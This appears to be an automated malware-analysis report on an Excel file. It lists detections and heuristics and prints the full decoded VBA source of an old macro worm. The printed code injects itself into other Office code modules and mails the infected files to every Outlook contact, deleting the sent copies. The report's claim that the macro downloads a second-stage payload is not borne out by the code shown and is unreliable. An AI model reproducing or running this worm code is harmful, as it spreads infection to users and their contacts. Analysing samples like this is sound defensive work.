MALICIOUS (Risk Score: 220)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
The file is an Excel document containing VBA macros. The macros utilize CreateObject and GetObject calls, and the ClamAV detection indicates it's a known malware variant. The script attempts to download and execute a second-stage payload, as evidenced by the ClamAV detection of an extracted artifact (Win.Worm.VBS-213) and the general behavior of such macro-based threats.
Heuristics (4)
- ClamAV: Doc.Trojan.18th-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.18th-1
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2622 bytes |

SHA-256: 2280d99d5473584a63d94f801673769324d31c9665b7d16e28809e54ed1df018

Detection: ClamAV: Win.Worm.VBS-213

Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Hikaru
Dim λ As String, ν As Byte
Private Sub Document_Close()
On Error Resume Next
ρ Application.VBE: ν = 1
ρ GetObject(, "Word.Application").VBE
ρ GetObject(, "Excel.Application").VBE
Send
End Sub
Private Sub ρ(ByRef ο As Object)
For ι = 1 To ο.CodePanes.Count
Set υ = ο.CodePanes(ι).CodeModule
If υ.Find("~^^~", 0, 0, 0, 0) And ν = 0 Then
λ = υ.Lines(1, υ.CountOfLines): ν = 1: ι = 0
End If
If Not υ.Find("~^^~", 0, 0, 0, 0) And ν = 1 Then
ο.CodePanes(ι).CodeModule.InsertLines 1, λ
End If
Next
End Sub
Private Sub Workbook_Deactivate(): Document_Close: End Sub
Private Sub UserForm_Initialize(): Document_Close: End Sub
Private Sub Worksheet_Activate(): Document_Close: End Sub
Private Sub Send()
On Error Resume Next
Set OLA = CreateObject("Outlook.Application")
For Each ALC In OLA.GetNameSpace("MAPI").AddressLists
If ALC.AddressEntries.Count <> 0 Then
Set FSS = OLA.CreateItem(0)
For FSN = 1 To ALC.AddressEntries.Count
FSS.BCC = FSS.BCC & "; " & ALC.AddressEntries(FSN).Address: Next
FSS.Subject = "Virus Alert!!!"
FSS.Body = "New O97M_Hikaru Virus." & Chr(13) & Chr(10) & "Exampler---------->"
FSS.Attachments.Add Application.ActiveWorkbook.FullName
FSS.Attachments.Add Application.ActiveDocument.FullName
FSS.DeleteAfterSubmit = 1
FSS.Send
End If: Next
End Sub
```